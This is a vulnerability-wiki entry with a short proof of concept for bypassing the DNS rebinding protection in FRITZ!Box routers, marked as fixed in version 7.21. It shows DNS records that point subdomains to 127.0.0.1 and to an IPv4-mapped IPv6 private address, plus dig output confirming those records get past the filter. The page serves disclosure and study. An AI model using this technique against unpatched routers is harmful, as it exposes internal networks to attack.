pwnwiki.com
,
已修复版本
>= 7.21
POC
Supposing the following resource records (RR) are configured for different subdomains of example.com: ------------------------------------------------------------------------ private.example.com 1 IN A 192.168.178.20 local.example.com 1 IN A 127.0.0.1 privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20 ------------------------------------------------------------------------ A DNS request to the FRITZ!Box router for the subdomain private.example.com returns an empty answer, as expected: ------------------------------------------------------------------------ $ dig private.example.com @192.168.178.1 ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;private.example.com. IN A ------------------------------------------------------------------------ DNS requests for the subdomains privateipv6.example.com and local.example.com return the configured resource records successfully, effectively bypassing the DNS rebinding protection: ------------------------------------------------------------------------ $ dig privateipv6.example.com @192.168.178.1 AAAA ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;privateipv6.example.com. IN AAAA ;; ANSWER SECTION: privateipv6.example.com. 1 IN AAAA ::ffff:192.168.178.20 $ dig local.example.com @192.168.178.1 ; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;local.example.com. IN A ;; ANSWER SECTION: local.example.com. 1 IN A 127.0.0.1 ------------------------------------------------------------------------
免费、自由、人人可编辑的漏洞库
